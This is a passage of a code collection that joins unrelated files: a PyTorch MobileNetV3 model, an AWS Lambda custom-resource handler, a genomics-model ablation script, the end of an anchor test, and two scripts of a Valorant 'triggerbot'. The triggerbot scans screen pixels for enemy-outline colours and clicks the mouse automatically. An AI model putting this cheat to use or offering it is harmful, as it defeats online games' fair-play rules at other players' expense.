strides[0] * 3 / 2 - (sizes[0] * scales[0] / np.sqrt(ratios[0])) / 2,
strides[0] / 2 - (sizes[0] * scales[0] * np.sqrt(ratios[0])) / 2,
strides[0] * 3 / 2 + (sizes[0] * scales[0] / np.sqrt(ratios[0])) / 2,
strides[0] / 2 + (sizes[0] * scales[0] * np.sqrt(ratios[0])) / 2,
],
decimal=6,
)
np.testing.assert_almost_equal(
all_anchors[5, :],
[
strides[0] * 3 / 2 - (sizes[0] * scales[1] / np.sqrt(ratios[0])) / 2,
strides[0] / 2 - (sizes[0] * scales[1] * np.sqrt(ratios[0])) / 2,
strides[0] * 3 / 2 + (sizes[0] * scales[1] / np.sqrt(ratios[0])) / 2,
strides[0] / 2 + (sizes[0] * scales[1] * np.sqrt(ratios[0])) / 2,
],
decimal=6,
)
np.testing.assert_almost_equal(
all_anchors[6, :],
[
strides[0] * 3 / 2 - (sizes[0] * scales[0] / np.sqrt(ratios[1])) / 2,
strides[0] / 2 - (sizes[0] * scales[0] * np.sqrt(ratios[1])) / 2,
strides[0] * 3 / 2 + (sizes[0] * scales[0] / np.sqrt(ratios[1])) / 2,
strides[0] / 2 + (sizes[0] * scales[0] * np.sqrt(ratios[1])) / 2,
],
decimal=6,
)
np.testing.assert_almost_equal(
all_anchors[7, :],
[
strides[0] * 3 / 2 - (sizes[0] * scales[1] / np.sqrt(ratios[1])) / 2,
strides[0] / 2 - (sizes[0] * scales[1] * np.sqrt(ratios[1])) / 2,
strides[0] * 3 / 2 + (sizes[0] * scales[1] / np.sqrt(ratios[1])) / 2,
strides[0] / 2 + (sizes[0] * scales[1] * np.sqrt(ratios[1])) / 2,
],
decimal=6,
)
np.testing.assert_almost_equal(
all_anchors[8, :],
[
strides[0] / 2 - (sizes[0] * scales[0] / np.sqrt(ratios[0])) / 2,
strides[0] * 3 / 2 - (sizes[0] * scales[0] * np.sqrt(ratios[0])) / 2,
strides[0] / 2 + (sizes[0] * scales[0] / np.sqrt(ratios[0])) / 2,
strides[0] * 3 / 2 + (sizes[0] * scales[0] * np.sqrt(ratios[0])) / 2,
],
decimal=6,
)
np.testing.assert_almost_equal(
all_anchors[9, :],
[
strides[0] / 2 - (sizes[0] * scales[1] / np.sqrt(ratios[0])) / 2,
strides[0] * 3 / 2 - (sizes[0] * scales[1] * np.sqrt(ratios[0])) / 2,
strides[0] / 2 + (sizes[0] * scales[1] / np.sqrt(ratios[0])) / 2,
strides[0] * 3 / 2 + (sizes[0] * scales[1] * np.sqrt(ratios[0])) / 2,
],
decimal=6,
)
np.testing.assert_almost_equal(
all_anchors[10, :],
[
strides[0] / 2 - (sizes[0] * scales[0] / np.sqrt(ratios[1])) / 2,
strides[0] * 3 / 2 - (sizes[0] * scales[0] * np.sqrt(ratios[1])) / 2,
strides[0] / 2 + (sizes[0] * scales[0] / np.sqrt(ratios[1])) / 2,
strides[0] * 3 / 2 + (sizes[0] * scales[0] * np.sqrt(ratios[1])) / 2,
],
decimal=6,
)
np.testing.assert_almost_equal(
all_anchors[11, :],
[
strides[0] / 2 - (sizes[0] * scales[1] / np.sqrt(ratios[1])) / 2,
strides[0] * 3 / 2 - (sizes[0] * scales[1] * np.sqrt(ratios[1])) / 2,
strides[0] / 2 + (sizes[0] * scales[1] / np.sqrt(ratios[1])) / 2,
strides[0] * 3 / 2 + (sizes[0] * scales[1] * np.sqrt(ratios[1])) / 2,
],
decimal=6,
)
np.testing.assert_almost_equal(
all_anchors[12, :],
[
strides[0] * 3 / 2 - (sizes[0] * scales[0] / np.sqrt(ratios[0])) / 2,
strides[0] * 3 / 2 - (sizes[0] * scales[0] * np.sqrt(ratios[0])) / 2,
strides[0] * 3 / 2 + (sizes[0] * scales[0] / np.sqrt(ratios[0])) / 2,
strides[0] * 3 / 2 + (sizes[0] * scales[0] * np.sqrt(ratios[0])) / 2,
],
decimal=6,
)
np.testing.assert_almost_equal(
all_anchors[13, :],
[
strides[0] * 3 / 2 - (sizes[0] * scales[1] / np.sqrt(ratios[0])) / 2,
strides[0] * 3 / 2 - (sizes[0] * scales[1] * np.sqrt(ratios[0])) / 2,
strides[0] * 3 / 2 + (sizes[0] * scales[1] / np.sqrt(ratios[0])) / 2,
strides[0] * 3 / 2 + (sizes[0] * scales[1] * np.sqrt(ratios[0])) / 2,
],
decimal=6,
)
np.testing.assert_almost_equal(
all_anchors[14, :],
[
strides[0] * 3 / 2 - (sizes[0] * scales[0] / np.sqrt(ratios[1])) / 2,
strides[0] * 3 / 2 - (sizes[0] * scales[0] * np.sqrt(ratios[1])) / 2,
strides[0] * 3 / 2 + (sizes[0] * scales[0] / np.sqrt(ratios[1])) / 2,
strides[0] * 3 / 2 + (sizes[0] * scales[0] * np.sqrt(ratios[1])) / 2,
],
decimal=6,
)
np.testing.assert_almost_equal(
all_anchors[15, :],
[
strides[0] * 3 / 2 - (sizes[0] * scales[1] / np.sqrt(ratios[1])) / 2,
strides[0] * 3 / 2 - (sizes[0] * scales[1] * np.sqrt(ratios[1])) / 2,
strides[0] * 3 / 2 + (sizes[0] * scales[1] / np.sqrt(ratios[1])) / 2,
strides[0] * 3 / 2 + (sizes[0] * scales[1] * np.sqrt(ratios[1])) / 2,
],
decimal=6,
)
``` |
{
"source": "1e100/mobilenet_v3",
"score": 3
} |
#### File: 1e100/mobilenet_v3/mobilenet_v3.py
```python
from typing import Tuple, Union
import collections
import torch
from torch import nn
import mobilenet_v3_configs as conf
def hard_sigmoid(x: torch.Tensor, inplace: bool = True) -> torch.Tensor:
return nn.functional.relu6(x + 3, inplace=inplace) / 6
def hard_swish(x: torch.Tensor, inplace: bool = True) -> torch.Tensor:
return hard_sigmoid(x, inplace=inplace) * x
class HardSwish(nn.Module):
def __init__(self, inplace: bool = True) -> None:
super().__init__()
self._inplace = True
def forward(self, x: torch.Tensor) -> torch.Tensor:
return hard_swish(x, inplace=self._inplace)
def _get_activation(activation: str):
if activation == "relu":
return nn.ReLU
elif activation == "relu6":
return nn.ReLU6
elif activation == "hardswish":
return HardSwish
else:
raise ValueError(f"Unsupported activation: {activation}")
# SE and inverted residual are similar to MNASNet, but with MNV3 specific
# tweaks.
class _SqueezeAndExcitation(nn.Module):
def __init__(self, channels: int, se_ratio: float):
if se_ratio <= 0.0:
raise ValueError("Squeeze and excitation depth ratio must be positive.")
super().__init__()
reduced_ch = _round_to_multiple_of(channels * se_ratio, 8)
# Note: official implementation uses bias on SE.
self.reduce = nn.Conv2d(channels, reduced_ch, 1, bias=True)
self.expand = nn.Conv2d(reduced_ch, channels, 1, bias=True)
def forward(self, x: torch.Tensor) -> torch.Tensor:
y = x.mean([2, 3], keepdim=True)
y = nn.functional.relu(self.reduce(y), inplace=True)
return hard_sigmoid(self.expand(y)) * x
class _ConvBnActivationBlock(nn.Module):
def __init__(
self,
in_ch: int,
out_ch: int,
kernel_size: Union[int, Tuple[int, int]],
stride: Union[int, Tuple[int, int]],
padding: Union[int, Tuple[int, int, int, int]],
dilation: Union[int, Tuple[int, int]],
activation: str = "relu",
):
super().__init__()
self.conv = nn.Conv2d(
in_ch,
out_ch,
kernel_size,
stride=stride,
padding=padding,
dilation=dilation,
bias=False,
)
self.bn = nn.BatchNorm2d(out_ch)
self.activation = _get_activation(activation)(inplace=True)
def forward(self, x: torch.Tensor) -> torch.Tensor:
x = self.conv(x)
x = self.bn(x)
return self.activation(x)
class _MobileNetV3Block(nn.Module):
def __init__(
self,
in_ch,
exp_ch,
out_ch,
kernel_size,
stride,
dilation=1,
se_ratio=None,
activation="relu",
allow_residual=True,
):
super().__init__()
assert stride in [1, 2]
assert kernel_size in [3, 5]
activation = _get_activation(activation)
self.apply_residual = allow_residual and (in_ch == out_ch and stride == 1)
# Features are collected from pointwise immediately before the next
# downsampling. If there's no downsampling, we don't keep the features.
self.keep_features = stride > 1
self.se_ratio = se_ratio
if in_ch != exp_ch:
# Pointwise expand.
self.expand = nn.Sequential(
nn.Conv2d(in_ch, exp_ch, 1, bias=False),
nn.BatchNorm2d(exp_ch),
activation(inplace=True),
)
else:
self.expand = None
effective_kernel_size = (kernel_size - 1) * dilation + 1
self.dw_conv = nn.Sequential(
nn.Conv2d(
exp_ch,
exp_ch,
kernel_size,
padding=effective_kernel_size // 2,
stride=stride,
dilation=dilation,
groups=exp_ch,
bias=False,
),
nn.BatchNorm2d(exp_ch),
activation(inplace=True),
)
if se_ratio is not None:
self.se = _SqueezeAndExcitation(exp_ch, se_ratio)
# Linear pointwise. Note that there's no activation afterwards.
self.contract = nn.Sequential(
nn.Conv2d(exp_ch, out_ch, 1, bias=False), nn.BatchNorm2d(out_ch)
)
def forward(self, x: torch.Tensor) -> torch.Tensor:
y = self.expand(x) if self.expand is not None else x
if self.keep_features:
self.features = y
y = self.dw_conv(y)
if self.se_ratio is not None:
y = self.se(y)
y = self.contract(y)
if self.apply_residual:
y += x
return y
def _round_to_multiple_of(val, divisor, round_up_bias=0.9):
""" Asymmetric rounding to make `val` divisible by `divisor`. With default
bias, will round up, unless the number is no more than 10% greater than the
smaller divisible value, i.e. (83, 8) -> 80, but (84, 8) -> 88. """
assert 0.0 < round_up_bias < 1.0
new_val = max(divisor, int(val + divisor / 2) // divisor * divisor)
return new_val if new_val >= round_up_bias * val else new_val + divisor
class MobileNetV3(nn.Module):
""" MobileNetV3 model: https://arxiv.org/pdf/1905.02244.pdf
>>> model = MobileNetV3(alpha=1.0, model_type="small")
>>> x = torch.rand(1, 3, 224, 224)
>>> y = model.forward(x)
>>> list(y.shape)
[1, 1000]
>>> y.nelement()
1000
"""
def __init__(
self,
alpha: float = 1.0,
in_ch: int = 3,
num_classes: int = 1000,
dropout: float = 0.2, # Per paper.
model_type: str = "large",
has_classifier: bool = True,
):
super().__init__()
assert alpha > 0.0
self.alpha = alpha
assert in_ch > 0
self.in_ch = in_ch
assert num_classes > 1
self.num_classes = num_classes
assert model_type in conf.CONFIG
self.model_type = model_type
self.has_classifier = has_classifier
config = conf.CONFIG[model_type]
# Scale the channels, forcing them to be multiples of 8, biased towards
# the higher number of channels.
for c in config:
c[0] = _round_to_multiple_of(c[0] * alpha, 8)
c[1] = _round_to_multiple_of(c[1] * alpha, 8)
c[2] = _round_to_multiple_of(c[2] * alpha, 8)
# Build the first layer. It's the same for all networks.
self.input_layer = _ConvBnActivationBlock(
in_ch,
config[0][0],
3, # kernel_size
padding=1,
stride=2,
dilation=1,
activation="hardswish",
)
# Build the bottleneck stack.
body = collections.OrderedDict()
for idx, c in enumerate(config):
in_ch, exp_ch, out_ch, kernel_size, stride, dilation, se_ratio, activation = (
c
)
body[f"bottleneck{idx}"] = _MobileNetV3Block(
in_ch,
exp_ch,
out_ch,
kernel_size,
stride,
dilation=dilation,
se_ratio=se_ratio,
activation=activation,
)
# Build the classifier.
shallow_tail = any(x in model_type for x in ["_segmentation", "_detection"])
if "large" in model_type:
last_conv_ch = 960 if not shallow_tail else 480
elif "small" in model_type:
last_conv_ch = 576 if not shallow_tail else 288
else:
raise ValueError("Invalid model type")
if alpha < 1.0:
last_conv_ch = _round_to_multiple_of(last_conv_ch * alpha, 8)
body["last_conv"] = _ConvBnActivationBlock(
config[-1][2],
last_conv_ch,
1,
padding=0,
stride=1,
dilation=1,
activation="hardswish",
)
self.body = nn.Sequential(body)
self.classifier = nn.Sequential(
nn.AdaptiveAvgPool2d(1),
nn.Flatten(),
nn.Linear(last_conv_ch, 1280),
HardSwish(inplace=True),
nn.Dropout(p=dropout, inplace=True),
nn.Linear(1280, num_classes),
)
def forward(self, x: torch.Tensor) -> torch.Tensor:
x = self.input_layer(x)
x = self.body(x)
if self.has_classifier:
x = self.classifier(x)
return x
``` |
{
"source": "1e17/Valorant-Triggerbot",
"score": 2
} |
#### File: 1e17/Valorant-Triggerbot/init.py
```python
import os, ctypes, keyboard, json, mss, PIL, PyQt5, time, sys, threading
from PyQt5 import QtCore, QtGui, QtWidgets
from PIL.Image import frombytes
from ctypes import wintypes
from os import system
# Settings
settings = json.load(open(os.getcwd()+'\\config.json'))
# System Constants
krnl32 = ctypes.WinDLL('kernel32', use_last_error=True)
user32 = ctypes.WinDLL('User32', use_last_error=True)
# Declarations
fovSize = settings['fovSize'] # area range
lenience = 5 # rgb offsets
r,g,b = (200,50,200) # color search
screenWidth, screenHeight = (user32.GetSystemMetrics(0), user32.GetSystemMetrics(1)) #monitor
fov = (int(screenWidth/2-fovSize), int(screenHeight/2-fovSize), int(screenWidth/2+fovSize), int(screenHeight/2+fovSize)) # search area
# Functions
def toggle(): # Enable/Disable
settings['triggerBot'] = not settings['triggerBot']
settings['triggerBot'] and krnl32.Beep(400,50), krnl32.Beep(600,100) or krnl32.Beep(600,50), krnl32.Beep(400,100)
# KeyBinds
keyboard.add_hotkey(settings['keyBind'], toggle, args=()) # toggle
# Fov Drawing
class FovVisualizer(QtWidgets.QWidget):
def __init__(self):
QtWidgets.QWidget.__init__(self, None)
self.resize(screenWidth,screenHeight)
self.pen = QtGui.QPen(QtGui.QColor(0, 255, 157))
self.pen.setWidth(1)
self.setWindowFlags(QtCore.Qt.FramelessWindowHint | QtCore.Qt.WindowStaysOnTopHint | QtCore.Qt.WindowTransparentForInput)
self.setAttribute(QtCore.Qt.WA_TranslucentBackground)
def paintEvent(self, event):
brush = QtGui.QPainter(self)
brush.setPen(self.pen)
brush.drawRect(screenWidth/2-(fovSize*2/2),screenHeight/2-(fovSize*2/2), fovSize*2, fovSize*2)
# Triggerbot
def Triggerbot():
while True:
if settings['triggerBot']:
with mss.mss() as ssobj: # create screenshot object
grab = ssobj.grab(fov) # screenshot
img = frombytes("RGB", grab.size, grab.bgra, "raw", "BGRX")
for y in range(0,fovSize): # y position
for x in range(0,fovSize): # x position
rp,gp,bp = img.getpixel((x,y)) # pixel color
if (r-lenience < rp and r+lenience < rp and g-lenience < gp and g+lenience < gp and b-lenience < bp and b+lenience < bp):
user32.mouse_event(0x0002)
time.sleep(0.005)
user32.mouse_event(0x0004)
break
else:
continue
break
# Trigger Bot
threading.Thread(target=Triggerbot).start()
# Fov Visualizer
if settings['showFov']:
app = QtWidgets.QApplication(sys.argv)
visualize = FovVisualizer();
visualize.show();
sys.exit(app.exec_())
```
#### File: 1e17/Valorant-Triggerbot/revamp.py
```python
import os;
if os.name != 'nt': raise SystemExit
import time
import json
import mss
import ctypes
import sys
from keyboard import add_hotkey
from PIL.Image import frombytes
from threading import Thread as thread
from art import *
from collections import namedtuple
CFG_PTH = 'valorant-config.json'
CWD = os.getcwd()
CLEAR = lambda:os.system('cls')
CFG_EXISTS = os.path.isfile(CWD+'/'+CFG_PTH)
KRNL32 = ctypes.WinDLL('kernel32', use_last_error=True)
USER32 = ctypes.WinDLL('User32', use_last_error=True)
WIDTH, HEIGHT = (USER32.GetSystemMetrics(0), USER32.GetSystemMetrics(1))
CONFIG = CFG_EXISTS and json.load(open(CFG_PTH))
SETTINGS = namedtuple('SETTINGS', ['color','tapShoot','tapShootDelay','fovX','fovY','key','lenience'])
STATUS = False
VALID_COLORS = ['yellow', 'purple']
def setup():
global SETTINGS
global CONFIG
os.system('color b')
"""Create user settings"""
while True:
CLEAR()
print(text2art('SETUP'))
try:
CONFIG = dict([
('color', str(input('Color type (yellow, purple): '))),
('tapShoot', int(input('Tap Shoot (0:true 1:false): '))),
('tapShootDelay', int(input('Tap Shoot Delay (ms): '))),
('fovX', int(input('Fov X size: '))),
('fovY', int(input('Fov Y size: '))),
('key', str(input('Toggle bind: '))),
('lenience', int(input('Color Lenience (recommended 5-20): ')))
])
if (CONFIG['color'] not in VALID_COLORS):
CLEAR()
print('[ERR] Supported colors (yellow & purple)')
time.sleep(5)
continue
if (CONFIG['tapShoot'] not in [0,1]):
CLEAR()
print('[ERR] Select 0 or 1 for tap shoot')
time.sleep(5)
continue
except:
continue
break
config_file = open(CFG_PTH, 'a+')
config_file.write(json.dumps(CONFIG, indent=2))
CLEAR()
print('Finished! Enjoy!')
time.sleep(2)
def toggle():
global STATUS
"""Toggles triggerbot"""
STATUS = not STATUS
STATUS and KRNL32.Beep(400,50), KRNL32.Beep(600,100) or KRNL32.Beep(600,50), KRNL32.Beep(400,100)
print('Status: '+ (STATUS and 'Enabled ' or 'Disabled'), end='\r', flush=True)
def main():
global SETTINGS
"""Main Loop"""
if (not CFG_EXISTS): setup()
SETTINGS = SETTINGS(**CONFIG)
LE = SETTINGS.lenience
RGB = SETTINGS.color == 'purple' and (200,50,200) or SETTINGS.color == 'yellow' and (255,255,0)
FOV = (int(WIDTH/2-SETTINGS.fovX), int(HEIGHT/2-SETTINGS.fovY), int(WIDTH/2+SETTINGS.fovX), int(HEIGHT/2+SETTINGS.fovY))
add_hotkey(SETTINGS.key, toggle, args=())
CLEAR();print(text2art('V-BOT'));print('Keybind: '+SETTINGS.key)
while True:
if STATUS:
with mss.mss() as ssobj:
grab = ssobj.grab(FOV)
img = frombytes("RGB", grab.size, grab.bgra, "raw", "BGRX")
for y in range(0,SETTINGS.fovY):
for x in range(0,SETTINGS.fovX):
rp,gp,bp = img.getpixel((x,y))
if (RGB[0]-LE < rp and RGB[0]+LE < rp and RGB[1]-LE < gp and RGB[1]+LE < gp and RGB[2]-LE < bp and RGB[2]+LE < bp):
USER32.mouse_event(0x0002)
time.sleep(0.005)
USER32.mouse_event(0x0004)
break
else:
continue
break
time.sleep(SETTINGS.tapShoot == 0 and (SETTINGS.tapShootDelay*0.001) or 0)
if (__name__ == '__main__'):
main()
# dd
``` |
{
"source": "1earnpy/customresource",
"score": 2
} |
#### File: lambda/python/customresource.py
```python
import json
import logging
import signal
from urllib2 import build_opener, HTTPHandler, Request
LOGGER = logging.getLogger()
LOGGER.setLevel(logging.INFO)
def handler(event, context):
'''Handle Lambda event from AWS'''
# Setup alarm for remaining runtime minus a second
signal.alarm((context.get_remaining_time_in_millis() / 1000) - 1)
try:
LOGGER.info('REQUEST RECEIVED:\n %s', event)
LOGGER.info('REQUEST RECEIVED:\n %s', context)
if event['RequestType'] == 'Create':
LOGGER.info('CREATE!')
send_response(event, context, "SUCCESS",
{"Message": "Resource creation successful!"})
elif event['RequestType'] == 'Update':
LOGGER.info('UPDATE!')
send_response(event, context, "SUCCESS",
{"Message": "Resource update successful!"})
elif event['RequestType'] == 'Delete':
LOGGER.info('DELETE!')
send_response(event, context, "SUCCESS",
{"Message": "Resource deletion successful!"})
else:
LOGGER.info('FAILED!')
send_response(event, context, "FAILED",
{"Message": "Unexpected event received from CloudFormation"})
except: #pylint: disable=W0702
LOGGER.info('FAILED!')
send_response(event, context, "FAILED", {
"Message": "Exception during processing"})
def send_response(event, context, response_status, response_data):
'''Send a resource manipulation status response to CloudFormation'''
response_body = json.dumps({
"Status": response_status,
"Reason": "See the details in CloudWatch Log Stream: " + context.log_stream_name,
"PhysicalResourceId": context.log_stream_name,
"StackId": event['StackId'],
"RequestId": event['RequestId'],
"LogicalResourceId": event['LogicalResourceId'],
"Data": response_data
})
LOGGER.info('ResponseURL: %s', event['ResponseURL'])
LOGGER.info('ResponseBody: %s', response_body)
opener = build_opener(HTTPHandler)
request = Request(event['ResponseURL'], data=response_body)
request.add_header('Content-Type', '')
request.add_header('Content-Length', len(response_body))
request.get_method = lambda: 'PUT'
response = opener.open(request)
LOGGER.info("Status code: %s", response.getcode())
LOGGER.info("Status message: %s", response.msg)
def timeout_handler(_signal, _frame):
'''Handle SIGALRM'''
raise Exception('Time exceeded')
signal.signal(signal.SIGALRM, timeout_handler)
``` |
{
"source": "1edv/evolution",
"score": 2
} |
#### File: model/benchmarking_models/ablation_study.py
```python
import sys
sys.path.insert(0, './')
from rr_aux import *
##Clear Memory
tf.reset_default_graph()
tf.keras.backend.clear_session()
gc.collect()
##
NUM_GPU = len(get_available_gpus())
if(NUM_GPU>0) :
config = tf.ConfigProto()
config.gpu_options.allow_growth = True # dynamically grow the memory used on the GPU
print(tf.__version__)
print(keras.__version__)
model_conditions = 'Glu'
#sys.argv[1] appended to beginning of path
dir_path=os.path.join('..','..','..','data',model_conditions)
###
sys.argv = sys.argv[1:]
print(sys.argv)
## Load the data matrix
with h5py.File(join(dir_path,'_trX.h5'), 'r') as hf:
_trX = hf['_trX'][:]
with h5py.File(join(dir_path,'_trY.h5'), 'r') as hf:
_trY = hf['_trY'][:]
with h5py.File(join(dir_path,'_vaX.h5'), 'r') as hf:
_vaX = hf['_vaX'][:]
with h5py.File(join(dir_path,'_vaY.h5'), 'r') as hf:
_vaY = hf['_vaY'][:]
with h5py.File(join(dir_path,'_teX.h5'), 'r') as hf:
_teX = hf['_teX'][:]
with h5py.File(join(dir_path,'_teY.h5'), 'r') as hf:
_teY = hf['_teY'][:]
_trX.shape , _trY.shape , _vaX.shape , _vaY.shape , _teX.shape , _teY.shape
trX = _trX #np.concatenate((_trX, _trX_rc), axis = 1) #np.squeeze((_trX))#
vaX = _vaX # np.concatenate((_vaX, _vaX_rc), axis = 1) #np.squeeze((_vaX))#
teX = _teX # np.concatenate((_teX, _teX_rc), axis = 1)#np.squeeze((_teX))#
## Load the scaler function (scaler was trained on the synthesized data
scaler = sklearn.externals.joblib.load(join(dir_path,'scaler.save'))
vaY = (scaler.transform(_vaY.reshape(1, -1))).reshape(_vaY.shape) #_vaY#
trY = (scaler.transform(_trY.reshape(1, -1))).reshape(_trY.shape) #_trY#
teY = (scaler.transform(_teY.reshape(1, -1))).reshape(_teY.shape) #_teY#
### If using generator, have a smaller val set for faster evaluation
if 0:
s_trX = np.vstack((trX , vaX))
s_trY = np.vstack((trY , vaY))
trX = s_trX[1000:,:]
trY = s_trY[1000:,:]
vaX = s_trX[0:1000,:]
vaY = s_trY[0:1000,:]
print(trX.shape , trY.shape , vaX.shape , vaY.shape , _teX.shape , _teY.shape)
input_shape = trX.shape
def fitness_function_model(model_params) :
n_val_epoch = model_params['n_val_epoch']
epochs= model_params['epochs']
batch_size= model_params['batch_size']
l1_weight= model_params['l1_weight']
l2_weight= model_params['l2_weight']
motif_conv_hidden= model_params['motif_conv_hidden']
conv_hidden= model_params['conv_hidden']
n_hidden= model_params['n_hidden']
n_heads= model_params['n_heads']
conv_width_motif= model_params['conv_width_motif']
dropout_rate= model_params['dropout_rate']
attention_dropout_rate= model_params['attention_dropout_rate']
lr= model_params['lr']
n_aux_layers= model_params['n_aux_layers']
n_attention_layers= model_params['n_attention_layers']
add_cooperativity_layer= model_params['add_cooperativity_layer']
device_type = model_params['device_type']
input_shape = model_params['input_shape']
loss = model_params['loss']
padding = model_params['padding']
ablated_layer = model_params['ablated_layer']
if(model_params['device_type']=='tpu'):
input_layer = Input(batch_shape=(batch_size,input_shape[1],input_shape[2])) #trX.shape[1:] #batch_shape=(batch_size,110,4)
else :
input_layer = Input(shape=input_shape[1:]) #trX.shape[1:] #
#https://arxiv.org/pdf/1801.05134.pdf
if (ablated_layer == 'conv1') :
x_f = input_layer
x_rc = input_layer
else :
x_f,x_rc = rc_Conv1D(motif_conv_hidden, conv_width_motif, padding=padding , \
kernel_regularizer = l1_l2(l1=l1_weight, l2=l2_weight), kernel_initializer='he_normal' ,
data_format = 'channels_last' , use_bias=False)(input_layer)
x_f = BatchNormalization()(x_f)
x_rc = BatchNormalization()(x_rc)
x_f = Activation('relu')(x_f)
x_rc = Activation('relu')(x_rc)
if (ablated_layer == 'conv2') :
add_cooperativity_layer = False
if(add_cooperativity_layer==True) :
x_f = Lambda(lambda x : K.expand_dims(x,axis=1))(x_f)
x_rc = Lambda(lambda x : K.expand_dims(x,axis=1))(x_rc)
x =Concatenate(axis=1)([x_f, x_rc] )
x = keras.layers.ZeroPadding2D(padding = ((0,0 ),(int(conv_width_motif/2)-1,int(conv_width_motif/2))),
data_format = 'channels_last')(x)
x = Conv2D(conv_hidden, (2,conv_width_motif), padding='valid' ,\
kernel_regularizer = l1_l2(l1=l1_weight, l2=l2_weight), kernel_initializer='he_normal' ,
data_format = 'channels_last' , use_bias=False)(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = Lambda(lambda x : K.squeeze(x,axis=1))(x)
else:
x =Add()([x_f, x_rc] )
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = Dropout(dropout_rate)(x)
if (ablated_layer == 'conv3') :
n_aux_layers = 0
for i in range(n_aux_layers) :
#res_input = x
x = Conv1D(conv_hidden, (conv_width_motif), padding=padding ,\
kernel_regularizer = l1_l2(l1=l1_weight, l2=l2_weight), kernel_initializer='he_normal' ,
data_format = 'channels_last' , use_bias=False)(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
#x = Add()([res_input, x])
if (ablated_layer == 'transformer') :
n_attention_layers = 0
for i in range(n_attention_layers) :
mha_input = x
x = MultiHeadAttention( head_num=n_heads,name='Multi-Head'+str(i),
kernel_regularizer = l1_l2(l1=l1_weight, l2=l2_weight))(x) #### DO NOT MAX POOL or AVG POOL
if dropout_rate > 0.0:
x = Dropout(rate=attention_dropout_rate)(x)
else:
x = x
x = Add()([mha_input, x])
x = LayerNormalization()(x)
ff_input = x
x = FeedForward(units= n_heads, kernel_regularizer = l1_l2(l1=l1_weight, l2=l2_weight))(x)
if dropout_rate > 0.0:
x = Dropout(rate=attention_dropout_rate)(x)
else:
x = x
x = Add()([ff_input, x])
x = LayerNormalization()(x)
if (ablated_layer != 'lstm') :
x = Bidirectional(LSTM(n_heads, return_sequences=True,
kernel_regularizer = l1_l2(l1=l1_weight, l2=l2_weight),
kernel_initializer='he_normal' , dropout = dropout_rate))(x)
x = Dropout(dropout_rate)(x)
if(len(x.get_shape())>2):
x = Flatten()(x)
if (ablated_layer != 'dense') :
x = Dense(int(n_hidden),
kernel_regularizer = l1_l2(l1=l1_weight, l2=l2_weight),
kernel_initializer='he_normal' , use_bias=True)(x)
x = Activation('relu')(x)
x = Dropout(dropout_rate)(x) #https://arxiv.org/pdf/1801.05134.pdf
x = Dense(int(n_hidden), kernel_regularizer = l1_l2(l1=l1_weight, l2=l2_weight),
kernel_initializer='he_normal', use_bias=True )(x)
x = Activation('relu')(x)
x = Dropout(dropout_rate)(x) #https://arxiv.org/pdf/1801.05134.pdf
output_layer = Dense(1, kernel_regularizer = l1_l2(l1=l1_weight, l2=l2_weight),
activation='linear', kernel_initializer='he_normal', use_bias=True )(x)
model = Model(input_layer, output_layer)
opt = tf.train.RMSPropOptimizer(lr) #tf.keras.optimizers.Adam(lr=lr)#
model.compile(optimizer=opt, loss=loss,metrics=['mean_squared_error', 'cosine_similarity'])
return model
ablated_layer_list = sys.argv#['conv1' , 'conv2' , 'conv3' , 'transformer' , 'lstm' , 'dense' , 'None']
for ablated_layer in ablated_layer_list :
model_params = {
'n_val_epoch' : 1000,
'epochs' : 1,
'batch_size': int(1024*1), # int(1024*3) , #64*55 fits , #best batch size is 1024
'l1_weight': 0,#1e-6#1e-7#0.01 # l1 should always be zero
'l2_weight': 0,#1e-7#0.01
'motif_conv_hidden': 256,
'conv_hidden': 64,
'n_hidden': 64, #128
'n_heads': 8,
'conv_width_motif':30, ##30bp for yeast is required for capturing all motifs
'dropout_rate': 0.05,
'lr':0.001,
'add_cooperativity_layer': True,
'n_aux_layers': 1,
'n_attention_layers':2,
'attention_dropout_rate' : 0,
'device_type' : 'gpu', #'tpu'/'gpu'/'cpu'
'input_shape' : input_shape,
'loss' : 'mean_squared_error',
'padding' : 'same',
'ablated_layer' : ablated_layer }
epochs = model_params['epochs']
batch_size = model_params['batch_size']
n_val_epoch = model_params['n_val_epoch']
epochs = model_params['epochs']
test_variable = ablated_layer
### Save model params as csv
w = csv.writer(open((test_variable+'_model_params.csv'), "w"))
for key, val in model_params.items():
w.writerow([key, val])
### Save model params as pickle
f = open((test_variable+'_model_params.pkl'),"wb")
pickle.dump(model_params,f)
f.close()
model=fitness_function_model(model_params)
print(model.summary())
model.fit(trX, trY, validation_data = (vaX[:100], vaY[:100]), batch_size=batch_size , epochs=epochs )
#model.fit_generator(training_generator, validation_data = (teX[:100], teY[:100]),
#epochs=epochs , steps_per_epoch = int(trX.shape[0]/(batch_size*n_val_epoch)) )
def read_hq_testdata(filename) :
with open(filename) as f:
reader = csv.reader(f, delimiter="\t")
d = list(reader)
sequences = [di[0] for di in d]
for i in tqdm(range(0,len(sequences))) :
if (len(sequences[i]) > 110) :
sequences[i] = sequences[i][-110:]
if (len(sequences[i]) < 110) :
while (len(sequences[i]) < 110) :
sequences[i] = 'N'+sequences[i]
A_onehot = np.array([1,0,0,0] , dtype=np.bool)
C_onehot = np.array([0,1,0,0] , dtype=np.bool)
G_onehot = np.array([0,0,1,0] , dtype=np.bool)
T_onehot = np.array([0,0,0,1] , dtype=np.bool)
N_onehot = np.array([0,0,0,0] , dtype=np.bool)
mapper = {'A':A_onehot,'C':C_onehot,'G':G_onehot,'T':T_onehot,'N':N_onehot}
worddim = len(mapper['A'])
seqdata = np.asarray(sequences)
seqdata_transformed = seq2feature(seqdata)
print(seqdata_transformed.shape)
expressions = [di[1] for di in d]
expdata = np.asarray(expressions)
expdata = expdata.astype('float')
return np.squeeze(seqdata_transformed),expdata
X,Y = read_hq_testdata(os.path.join('..','..','..','data','Glu','HQ_testdata.txt'))
Y = [float(x) for x in Y]
Y_pred= model.predict(X, batch_size = 1024)
Y_pred = [float(i[0]) for i in Y_pred]
pcc = scipy.stats.pearsonr(Y,Y_pred )[0]
print(pcc)
df = pd.DataFrame({'Y' : Y , 'Y_pred' : Y_pred , 'pcc' : pcc})
df.to_csv(ablated_layer+"_results.csv")
model.save(ablated_layer+"_model.h5")
def read_hq_testdata(filename) :
with open(filename) as f:
reader = csv.reader(f, delimiter="\t")
d = list(reader)
sequences = [di[0] for di in d]
for i in tqdm(range(0,len(sequences))) :
if (len(sequences[i]) > 110) :
sequences[i] = sequences[i][-110:]
if (len(sequences[i]) < 110) :
while (len(sequences[i]) < 110) :
